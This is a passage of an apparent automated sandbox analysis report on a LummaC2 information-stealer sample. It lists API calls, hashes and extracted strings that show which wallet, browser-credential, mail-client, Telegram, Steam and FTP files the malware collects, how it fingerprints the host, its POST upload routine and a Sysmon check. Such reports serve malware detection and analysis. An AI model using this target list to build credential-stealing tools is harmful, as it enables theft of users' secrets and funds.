                                                          • Instruction Fuzzy Hash: 05E229F2E001065AEF2896588D8357F7969EB14304F25453FF80AF63D1EA3C8E558A9F
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.3244849717.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_I2BJhmJou4.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID:
                                                          • String ID: $jRk$%appd576xedata%\El576xedectrum\wal576xedlets$%appd576xedata%\Ethe576xedreum$%appd576xedata%\Op576xedera Softw576xedare\Op576xedera GX Sta576xedble$%appd576xedata%\Ope576xedra Soft576xedware\Op576xedera Sta576xedble$%appda576xedta%\Bina576xednce$%appda576xedta%\Mo576xedzilla\Fir576xedefox\Prof576xediles$%appda576xedta%\Op576xedera Softwa576xedre\Op576xedera Neo576xedn\Us576xeder Da576xedta$%appdata%\AnyDesk$%appdata%\Authy Desktop\Local Storage\leveldb$%appdata%\Bitcoin\wallets$%appdata%\Electrum\wallets$%appdata%\Exodus\exodus.wallet$%appdata%\FileZilla$%appdata%\Ledger Live$%appdata%\Telegram Desktop$%appdata%\atomic\Local Storage\leveldb$%appdata%\com.liberty.jaxx\IndexedDB$%lo576xedcalapp576xeddata%\Go576xedogle\Chr576xedome\Us576xeder Dat576xeda$%loc576xedalappda576xedta%\Kom576xedeta\Us576xeder Da576xedta$%locala576xedppdata%\Mic576xedrosoft\Edge\Us576xeder Data$%localappdata%\BraveSoftware\Brave-Browser\User Data$%localappdata%\Chro576xedmium\Use576xedr Data$%localappdata%\CocCoc\Browser\User Data$%localappdata%\Coinomi\Coinomi\wallets$%localappdata%\Comodo\Dragon\User Data$%programfiles%\Steam$%programfiles%\Steam\config$%userpro576xedfile%$%userprofile%$*.576xedtxt$*.conf$*.kbdx$*.leveldb$*576xed$.fin576xedger-pr576xedint.fp$?$@an($Aan($Aan($Applications/AnyDesk$Applications/FileZilla$Applications/KeePass$Applications/Steam$Applications/Steam/config$Applications/Telegram$Brave Software$Chr576xedome$Chromi576xedum$CocCoc$Comodo$Ed576xedge$Import576xedant File576xeds/Pro576xedfile$Kom576xedeta$Mozi576xedlla Firef576xedox$Op576xedera G576xedX Stab576xedle$Op576xedera Neo576xedn$Op576xedera Sta576xedble$ST4$TT4$TT4$Wal576xedlets/Bi576xednance$Wal576xedlets/Bin576xedance$Wall576xedets/Binan576xedce$Wall576xedets/Ele576xedctrum$Wall576xedets/Eth576xedereum$Wallets/Atomic$Wallets/Authy Desktop$Wallets/Bitcoin core$Wallets/Coinomi$Wallets/Electrum$Wallets/Exodus$Wallets/JAXX New Version$Wallets/Ledger Live$ap576xedp-sto576xedre.js576xedon$keyst576xedore$q7 C$recentservers.xml$sim576xedple-sto576xedrage.j576xedson$sitemanager.xml$ssfn*$y_B>
                                                          • API String ID: 0-3008219856
                                                          • Opcode ID: 89aa1017212fee1e620a7fbe6eb5b8cc1132262bae267c9db256cfec3297b749
                                                          • Instruction ID: b823253c8ecb5ad27e2b287cb1dce7157abede6b904688f5b513f038bfe6f5bb
                                                          • Opcode Fuzzy Hash: 89aa1017212fee1e620a7fbe6eb5b8cc1132262bae267c9db256cfec3297b749
                                                          • Instruction Fuzzy Hash: 71C207B1F002299BCF249B9AED4297E7970AB14300FE4453BE015FB391E67D89518B9F
                                                          APIs
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.3244849717.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_I2BJhmJou4.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: _strlen$CallbackDevicesDispatcherDisplayEnumUser
                                                          • String ID: Ver$$jRk$%s (%d.%d.%d)$- CP576xedU Name: $- HW576xedID: $- Phys576xedical Ins576xedtalled Memor576xedy: $- Screen Resoluton: $4jn`$4jn`$Aan($C: $GhYuIq$LID(Lu576xedmma ID): $Lum576xedmaC2, Build 20233101$Syste576xedm.txt$TT4$advapi32.dll$kernel32.dll$n._$n: $o._$o._$p7 C$q7 C$sion$user32.dll$x_B>$y_B>$y_B>
                                                          • API String ID: 3760342818-3740799521
                                                          • Opcode ID: 6304991c9ea5481c71fa155e6c83a9424bd06b545788eb0206d9441cc2e12171
                                                          • Instruction ID: 1dd07344ff1857ff55ac4e32df16f8dea444b4f0229405df86b90c0a9d587245
                                                          • Opcode Fuzzy Hash: 6304991c9ea5481c71fa155e6c83a9424bd06b545788eb0206d9441cc2e12171
                                                          • Instruction Fuzzy Hash: 710304B1504B419BDB349F29C88162BB7E0EB59310F24E92FE09BDB751D678E841CB1B
                                                          APIs
                                                          • lstrcmpW.KERNEL32(?,0045FD9A), ref: 0040C3B1
                                                          • lstrcatW.KERNEL32(?,?), ref: 0040C427
                                                          • lstrcatW.KERNEL32(?,0045E148), ref: 0040C431
                                                          • lstrlenW.KERNEL32(?), ref: 0040C581
                                                          • lstrcmpW.KERNEL32(?,0045FD96), ref: 0040C8D4
                                                          • lstrlenW.KERNEL32(00001A2F), ref: 0040C901
                                                          • lstrlenW.KERNEL32(00001A2F), ref: 0040D826
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.3244849717.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_I2BJhmJou4.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: lstrlen$lstrcatlstrcmp
                                                          • String ID: "B!H$"B!H$K2&e$Ku^%$Ku^%$Ku^%$Ku^%$Ku^%$Ku^%$Ku^%$L2&e$L2&e$LOCK$Y[[T$\??\$bi$kernel32.dll$ntdll.dll${#9${#9$Y=`$Y=`
                                                          • API String ID: 156957741-3266097529
                                                          • Opcode ID: c95b718d94f02bf5dd70c107e4f8e7e3b8c47b9c873664cf438ec1a2df9c61be
                                                          • Instruction ID: 88d54f90e21775ceda28cbcef53f0ea71a711b7076ec2cdd820ba9bac023bc57
                                                          • Opcode Fuzzy Hash: c95b718d94f02bf5dd70c107e4f8e7e3b8c47b9c873664cf438ec1a2df9c61be
                                                          • Instruction Fuzzy Hash: 3CF2D4B2D002198BDF249F9888856BEB674EF54700F24453BE516FB3E0D7788A458B9F
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.3244849717.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_I2BJhmJou4.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID:
                                                          • String ID: "w$ "w$EeS$EeS$EeS$JI3i$KI3i$KI3i$VL6T$VL6T$_m.Q$_m.Q$eo>w$fo>w$fo>w$mNA/
                                                          • API String ID: 0-3469262258
                                                          • Opcode ID: 4c97abe84ae84427aa405d53373a48c981ee8d0905f9e59dac9583b8261a3c6c
                                                          • Instruction ID: 53dd30e2529ea33158ec6446975a809713fb297dce848eb7333cd10e9ac2b658
                                                          • Opcode Fuzzy Hash: 4c97abe84ae84427aa405d53373a48c981ee8d0905f9e59dac9583b8261a3c6c
                                                          • Instruction Fuzzy Hash: 8303F8B1E101298BCF28DB58D9856BEB7B5AB24300F64052FD415EB360D378CD868B9F
                                                          APIs
                                                          • lstrcatW.KERNEL32(?,C0E8A4B4), ref: 0040E55B
                                                          • lstrcatW.KERNEL32(?,0045E102), ref: 0040E565
                                                          • lstrcatW.KERNEL32(?,00000000), ref: 0040E7C3
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.3244849717.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_I2BJhmJou4.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: lstrcat
                                                          • String ID: !t8$"t8$"t8$(lu$)lu$)lu$Ied|$Ied|$Pz#$Pz#$kernel32.dll$n_v$n_v$u2B$v2B$v2B
                                                          • API String ID: 4038537762-116603239
                                                          • Opcode ID: 12bf652b1bb6dbd17e31e8eaa5e0b1f59006f58fc57be00d5560b6d267fe1625
                                                          • Instruction ID: 6ea63d0937669649ebb299a5b80ec071dd59a3ad312de0dc3acd440ddf73d718
                                                          • Opcode Fuzzy Hash: 12bf652b1bb6dbd17e31e8eaa5e0b1f59006f58fc57be00d5560b6d267fe1625
                                                          • Instruction Fuzzy Hash: C7E2ECB1D001199BDF248B99C9456BEBA71BB14304F24093BE506FF3D1D3798A92CB9B
                                                          APIs
                                                          • RtlAllocateHeap.NTDLL(?,00000000,?), ref: 00430F45
                                                          • GetProcessHeap.KERNEL32 ref: 004314B2
                                                          • HeapAlloc.KERNEL32(?,00000008,00000028), ref: 004314EB
                                                          • GetDIBits.GDI32(?,00000001,00000000,?,?,00000001,00000000), ref: 004321FA
                                                          • ReleaseDC.USER32(00000000,?), ref: 00432204
                                                          • GetProcessHeap.KERNEL32 ref: 004326F0
                                                          • RtlFreeHeap.NTDLL(00000000,00000000,?), ref: 004326FF
                                                          • GetProcessHeap.KERNEL32 ref: 00432701
                                                          • HeapFree.KERNEL32(00000000,00000000,00000001), ref: 00432708
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.3244849717.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_I2BJhmJou4.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: Heap$Process$Free$AllocAllocateBitsRelease
                                                          • String ID: $jRk$?$TT4$TT4$q7 C$q7 C$y_B>$y_B>
                                                          • API String ID: 2023195035-2600574631
                                                          • Opcode ID: 5178d04942d301932e8b90fcb8df29a441936fb4bdecd8d5e545f1f0f99eb8d3
                                                          • Instruction ID: 86873c67e1170f8f17d23c3501641da2f07f81d3ce14e24acfbd45c3e0a97cea
                                                          • Opcode Fuzzy Hash: 5178d04942d301932e8b90fcb8df29a441936fb4bdecd8d5e545f1f0f99eb8d3
                                                          • Instruction Fuzzy Hash: 1FC2D771E001198BDF28CF98C9926BEB6B0AF5C314F24252BD515EB360D7789E41CB9B
                                                          APIs
                                                          • wsprintfW.USER32 ref: 004346DB
                                                          • RegEnumKeyExW.KERNELBASE(?,?,?,00000000,00000000,00000000,00000000,00000000,00000001), ref: 00434725
                                                          • RegCloseKey.KERNELBASE(?), ref: 0043475B
                                                          • RegOpenKeyExW.KERNELBASE(80000002,?,00000000,00020019,?,00000001), ref: 00434DA5
                                                          • RegCloseKey.ADVAPI32(?,00000001), ref: 00434F17
                                                          • RegCloseKey.ADVAPI32(?,00000001), ref: 00434F76
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.3244849717.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_I2BJhmJou4.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: Close$EnumOpenwsprintf
                                                          • String ID: $jRk$$jRk$%s%s$%s\%s$?$DisplayName$SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall$Software.txt$TT4$TT4$y_B>$y_B>
                                                          • API String ID: 44529101-205855365
                                                          • Opcode ID: dfa5f994e76983f3f8c4cf4d5fb617366fdece3346ca8abc111b64aa0c8d78cd
                                                          • Instruction ID: 3b7421bd9f904e401ff100dd7efef49cd6fe7be7401ce4d7a99a7b86551d2639
                                                          • Opcode Fuzzy Hash: dfa5f994e76983f3f8c4cf4d5fb617366fdece3346ca8abc111b64aa0c8d78cd
                                                          • Instruction Fuzzy Hash: E2621D70E002198BDF28CB9899455FEB674BF9C318F242517E625EB360D73CAD418B9B
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.3244849717.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_I2BJhmJou4.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: lstrcat
                                                          • String ID: %appdata%\The Bat!$%localappdata%\The Bat!$(lu$)lu$*.ABD$*.EML$*.FLX$*.HBI$*.MSB$*.MSG$*.TBB$*.TBK$*.TBN$*.mbox$*.txt$Mail Clients\The Bat\AppData$Mail Clients\The Bat\Local$kernel32.dll$n_v$n_v
                                                          • API String ID: 4038537762-373908387
                                                          • Opcode ID: 9865856486611794f12a139d77c18e5c05c58a82ffa741dd00c0f22e25a9caec
                                                          • Instruction ID: 4f92dd08cf156959b88a3ca31d79465b6333db6cd064390b28fe5485dbf8b601
                                                          • Opcode Fuzzy Hash: 9865856486611794f12a139d77c18e5c05c58a82ffa741dd00c0f22e25a9caec
                                                          • Instruction Fuzzy Hash: 7042D7F1E0012A9BCF149A55AC5667F7B74EB51304FA8052BE405FA3A1E338CA5187DF

                                                          Control-flow Graph

                                                          APIs
                                                          • lstrcatW.KERNEL32(?,0045E102,?,?,00000000,?,?,004058C6), ref: 00405BEF
                                                          • lstrcatW.KERNEL32(00000000,?,?,?,?,00000000,?,?,004058C6), ref: 00405EC4
                                                          • lstrcatW.KERNEL32(00000000,00000000,?,?,?,?,00000000,?,?,004058C6), ref: 00405ED7
                                                          • lstrcatW.KERNEL32(00000000,?,?,?,?,?,00000000,?,?,004058C6), ref: 00405EDF
                                                          • lstrcatW.KERNEL32(?,?,?,?,?,00000000,?,?,004058C6), ref: 00405EF3
                                                          • lstrcatW.KERNEL32(?,00000000,?,?,?,?,00000000,?,?,004058C6), ref: 00405F06
                                                          • lstrcatW.KERNEL32(?,84D55917,?,?,?,?,00000000,?,?,004058C6), ref: 00405F0E
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.3244849717.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_I2BJhmJou4.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: lstrcat
                                                          • String ID: *576xed$,$/Ext576xedensio576xedns/$\Loc576xedal Extens576xedion Settin576xedgs\$n_v$n_v
                                                          • API String ID: 4038537762-1578839816
                                                          • Opcode ID: c0ae44d74d2992532015a5b165d06f1b6e1b0c53f96b55d44899152aba16d5ae
                                                          • Instruction ID: e5bf92a8c3e4632e865b489cc3d7c979cf6fee557c11a145fed96966642f9e4d
                                                          • Opcode Fuzzy Hash: c0ae44d74d2992532015a5b165d06f1b6e1b0c53f96b55d44899152aba16d5ae
                                                          • Instruction Fuzzy Hash: 5FF1F9B1D006198BCF28DB98889657FBA74EB44300F25463BE506FA3D1D73C9A518F9B
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.3244849717.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_I2BJhmJou4.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID:
                                                          • String ID: 9a%^$9a%^$9a%^$9a%^$Content-Type: multipart/form-data; boundary=%s$L%$M%$M%$POST$SqDe87817huf871793q74$TeslaBrowser/5.5$winhttp.dll
                                                          • API String ID: 0-485045143
                                                          • Opcode ID: 93238ce1bce5d0f96e870d474ccd94fa1ee818516e10118a3e8a746afefe7c00
                                                          • Instruction ID: c94fe321a93857c184b0378d7fc968df2dfc5883700fbc77eb7b7d771d47b6e9
                                                          • Opcode Fuzzy Hash: 93238ce1bce5d0f96e870d474ccd94fa1ee818516e10118a3e8a746afefe7c00
                                                          • Instruction Fuzzy Hash: 73521DB1E802058BDF288EE89CC56FE7AA1AB58304F24052BE515E6390D77CCDC1979F

                                                          Control-flow Graph

                                                          APIs
                                                          • lstrcatW.KERNEL32(?,0045E102), ref: 0040641B
                                                          • lstrcatW.KERNEL32(?,?), ref: 00406423
                                                          • lstrcatW.KERNEL32(?,?), ref: 0040692A
                                                          • lstrcatW.KERNEL32(?,0045E102), ref: 00406934
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.3244849717.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_I2BJhmJou4.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: lstrcat
                                                          • String ID: Ku^%$Ku^%$Y=`$Y=`
                                                          • API String ID: 4038537762-3617128223
                                                          • Opcode ID: 8aca2622c3c3d1db70070bb2a5585c4558611a8a3d103d468629aeb63b1ff0ca
                                                          • Instruction ID: 9c9fa2152e9cc94146e123e662ad7e189f6101f2fbba187f29f17e96b34d8480
                                                          • Opcode Fuzzy Hash: 8aca2622c3c3d1db70070bb2a5585c4558611a8a3d103d468629aeb63b1ff0ca
                                                          • Instruction Fuzzy Hash: 72F11AB1D0010A9BCF249E9898815BE7A70AB54304F264D3BE517FA3E4D37CCD619B5B

                                                          Control-flow Graph

                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.3244849717.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_I2BJhmJou4.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID:
                                                          • String ID: *.CNM$*.PM$*.PMF$*.PML$*.PMN$*.USR$*.WPM$*CACHE.PM$C:\PMAIL$Ku^%$Ku^%$Mail Clients\Pegasus$kernel32.dll
                                                          • API String ID: 0-3904125897
                                                          • Opcode ID: c2af665f8e7a6a5fb5bf80d2b66eb56a303a312d12f5e083bf41e33716631812
                                                          • Instruction ID: 84dac617f37148c4bf89ffca1ba6cb6ddcd73cd34940f6261eccf690c7d83b59
                                                          • Opcode Fuzzy Hash: c2af665f8e7a6a5fb5bf80d2b66eb56a303a312d12f5e083bf41e33716631812
                                                          • Instruction Fuzzy Hash: E0E10BB1F0012A8BCF249E99A88167F7B74EB05354FA4052BE511EB361E77C8D409BDB

                                                          APIs
                                                          • lstrlenW.KERNEL32(?,?,?,?,?,?,?,?,?,75570880,?,0040B7CA,0040C9F4,?,?,?), ref: 0040AC5E
                                                          • lstrcatW.KERNEL32(?,\??\,?,?,?,?,?,?,?,?,75570880,?,0040B7CA,0040C9F4,?,?), ref: 0040ACC2
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.3244849717.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_I2BJhmJou4.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: lstrcatlstrlen
                                                          • String ID: \??\$kernel32.dll$ntdll.dll
                                                          • API String ID: 1475610065-320376045
                                                          • Opcode ID: 59cd2d1ccfa00f4e6d6c0bc67caa238be280e9eaa5e7935e3225b88f4da3e326
                                                          • Instruction ID: cf05d70ef52a95d5e776fd44e962e356ae6502797ff445894325f4a97f5a2809
                                                          • Opcode Fuzzy Hash: 59cd2d1ccfa00f4e6d6c0bc67caa238be280e9eaa5e7935e3225b88f4da3e326
                                                          • Instruction Fuzzy Hash: E302C5B1E443198ADF288A58C842ABFB670EB14310F25493BE515FB3E0D3798D519B9F

                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.3244849717.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_I2BJhmJou4.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: lstrcat
                                                          • String ID: Ku^%$Ku^%$Ku^%$Ku^%$Ku^%$cert9.db$cookies.sqlite$formhistory.sqlite$key4.db$logins.json$places.sqlite
                                                          • API String ID: 4038537762-2469458786
                                                          • Opcode ID: 5cc8e0385a1e201e213d2df3de3c9283c111f345cb6a958e47c3068638802ac2
                                                          • Instruction ID: d1eb3a7c9248dbe3af820f863548cf4fb9ed3ca77677979f9304c8b24649e330
                                                          • Opcode Fuzzy Hash: 5cc8e0385a1e201e213d2df3de3c9283c111f345cb6a958e47c3068638802ac2
                                                          • Instruction Fuzzy Hash: 9FB128B1E1012A97CF288E58A95567F7674AB45300FE4163BE816FB390E73DCA05878B

                                                          APIs
                                                          • LoadLibraryA.KERNELBASE(fltl), ref: 004263DE
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.3244849717.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_I2BJhmJou4.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: LibraryLoad
                                                          • String ID: A8r$SysmonDrv$dll$fltl$ib.d
                                                          • API String ID: 1029625771-1616023887
                                                          • Opcode ID: 2db2a4e5335f366ea46298763abcd9c468ba7e06b9ae091ed3480071e9d520ab
                                                          • Instruction ID: eb42a9731a47ced65949ee17454b9c50096d91694aa44b165600d0182d074a5f
                                                          • Opcode Fuzzy Hash: 2db2a4e5335f366ea46298763abcd9c468ba7e06b9ae091ed3480071e9d520ab
                                                          • Instruction Fuzzy Hash: E7E1D5B1709220DBCB24AB18E68572E76E5EB80304FA65D1FF485CB350D63DC9829B5B
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.3244849717.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_I2BJhmJou4.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID:
                                                          • String ID: M0@$UL6T$VL6T
                                                          • API String ID: 0-769956738
                                                          • Opcode ID: 3f7b00bcc41dc9950e88c817e104c281ddb069482e9e35bb9bdcf7b3ae0a07f6
                                                          • Instruction ID: 5b652a97159c1cfdc4854cd4c98ad9d0b798284c57e6c6df073e9b00d242a01e
                                                          • Opcode Fuzzy Hash: 3f7b00bcc41dc9950e88c817e104c281ddb069482e9e35bb9bdcf7b3ae0a07f6
                                                          • Instruction Fuzzy Hash: 0032A871D1051B8BCF289A98878D57EB6B0AB54350B24063BE915FB3D0D3BCCE419B9B

                                                          APIs
                                                          • NtReadFile.NTDLL(?,?,?,?,?,?,?,?,?,?,?,?,?,755AF770,755AF770), ref: 0040B792
                                                          • NtClose.NTDLL ref: 0040B7B1
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.3244849717.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_I2BJhmJou4.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: CloseFileRead
                                                          • String ID: LK$Y[$ntdll.dll
                                                          • API String ID: 752142053-4222218168
                                                          • Opcode ID: 674c179e697703f44c2f44510fd3adef83a7dc0e616b3acf5fe27305b6ec38da
                                                          • Instruction ID: 4487220ceab9a8d4c25bfe658470c8f7c93894071a863f051833b6fbd766e42f
                                                          • Opcode Fuzzy Hash: 674c179e697703f44c2f44510fd3adef83a7dc0e616b3acf5fe27305b6ec38da
                                                          • Instruction Fuzzy Hash: C0E1BDB29043058BDB249F69C59516EBAE1EB85314F25893FE485FB3D0E33C89418B9F
                                                          APIs
                                                            • Part of subcall function 0041F916: VirtualQuery.KERNEL32(?,00001000,00001000), ref: 0041F984
                                                          • NtQueryInformationProcess.NTDLL(000000FF,0000001E,?,00000004,00000000), ref: 004223A5
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.3244849717.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_I2BJhmJou4.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: Query$InformationProcessVirtual
                                                          • String ID: ]^4$^^4$^^4$^^4
                                                          • API String ID: 1364735940-2923853987
                                                          • Opcode ID: fa4f1894e5061ee90060a23dab345b4c9721d9ab9e288be8bc8134ce8262e773
                                                          • Instruction ID: e1f5519adcfceb975286f451de33aaf8cbb4e2bcda804772fdea06b08d6dcce1
                                                          • Opcode Fuzzy Hash: fa4f1894e5061ee90060a23dab345b4c9721d9ab9e288be8bc8134ce8262e773
                                                          • Instruction Fuzzy Hash: CD510B31B08271ABDB24891CA68097E62D45B44314FA44D2BFDD9EB328C2ADCDD6974F
                                                          APIs
                                                          • CreateDCW.GDI32(DISPLAY,00000000,00000000,00000000), ref: 00433288
                                                          • GetSystemMetrics.USER32(00000001), ref: 004333C3
                                                          • GetSystemMetrics.USER32(00000000), ref: 0043341E
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.3244849717.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_I2BJhmJou4.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: MetricsSystem$Create
                                                          • String ID: DISPLAY
                                                          • API String ID: 1087689917-865373369
                                                          • Opcode ID: e111dd26da1cce17ec30f396acc00c8357a98608eb13f1216a439640c8f7afd7
                                                          • Instruction ID: b761a9eed8f132f3d76dd51699d475c40aa8c4f3e32308c58242f5baaa05262b
                                                          • Opcode Fuzzy Hash: e111dd26da1cce17ec30f396acc00c8357a98608eb13f1216a439640c8f7afd7
                                                          • Instruction Fuzzy Hash: EA513672D041059BEF208F588845ABFB6A4EB9D312F34B563E516EB350D278CF814B9B
                                                          APIs
                                                          • Sleep.KERNELBASE(00001388,?,?,?,?,?,?,?,?,?,?,?,?,?,?,E3E203CD), ref: 004020D7
                                                          • ExitProcess.KERNEL32 ref: 00402428
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.3244849717.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_I2BJhmJou4.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: ExitProcessSleep
                                                          • String ID: Ku^%$Ku^%
                                                          • API String ID: 911557368-1067927601
                                                          • Opcode ID: 013c3d7dc7fc862d36ffcb00b25dcaf7516d0370d05350ed3a1ad5b255c26736
                                                          • Instruction ID: 7c1692d81d369eac2294152011f0ccab71a19272a549e25e1d59810d67b13e6b
                                                          • Opcode Fuzzy Hash: 013c3d7dc7fc862d36ffcb00b25dcaf7516d0370d05350ed3a1ad5b255c26736
                                                          • Instruction Fuzzy Hash: 82A1E571500B058BD7348E29D68862B76E0AB41714B248D3FE55BFBBE0D6FCE8459B0B
                                                          APIs
                                                          • NtQueryInformationProcess.NTDLL(000000FF,0000001F,?,00000004,00000000,?,?,?,?,?,?,?,?,?,?,?), ref: 004227D5
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.3244849717.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_I2BJhmJou4.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: InformationProcessQuery
                                                          • String ID: 9a%^$M%$M%
                                                          • API String ID: 1778838933-3204844187
                                                          • Opcode ID: 9ade9e483b5ebb250e7fe0e529f96f4c94ae799fe6f97278c80e701388524701
                                                          • Instruction ID: a14d1243167b6357461e6519a130038910b412cbb64089044718b0755659bab4
                                                          • Opcode Fuzzy Hash: 9ade9e483b5ebb250e7fe0e529f96f4c94ae799fe6f97278c80e701388524701
                                                          • Instruction Fuzzy Hash: 5A819875F04229ABCF28DF58EAD06ADB7B0AB24300FE48557D451E7351D2BC8A81CB4A
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.3244849717.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_I2BJhmJou4.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID:
                                                          • String ID: %localappdata%\Mailbird\Store$*.db$Mail Clients\Mailbird$\MessageIndex$kernel32.dll
                                                          • API String ID: 0-4169501468
                                                          • Opcode ID: 998153987a092bc391745c6bd773306619986c146018ef37c9d8809a776367a6
                                                          • Instruction ID: 37c33aadf0b1a5fededcf733a2f710a0aa0d7e8b715308be68c7b56e9875aa70
                                                          • Opcode Fuzzy Hash: 998153987a092bc391745c6bd773306619986c146018ef37c9d8809a776367a6
                                                          • Instruction Fuzzy Hash: C21209B1F4022A8BDF149B98A8C25BF7661EF10314FA4452BE411FA391D72D8A41CBDF
                                                          APIs
                                                          • lstrcmpiW.KERNELBASE(?,kernel32.dll,?,?,?,?,?,?,?,?,?,?,?,?,?,-000017AA), ref: 0043B7A5
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.3244849717.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
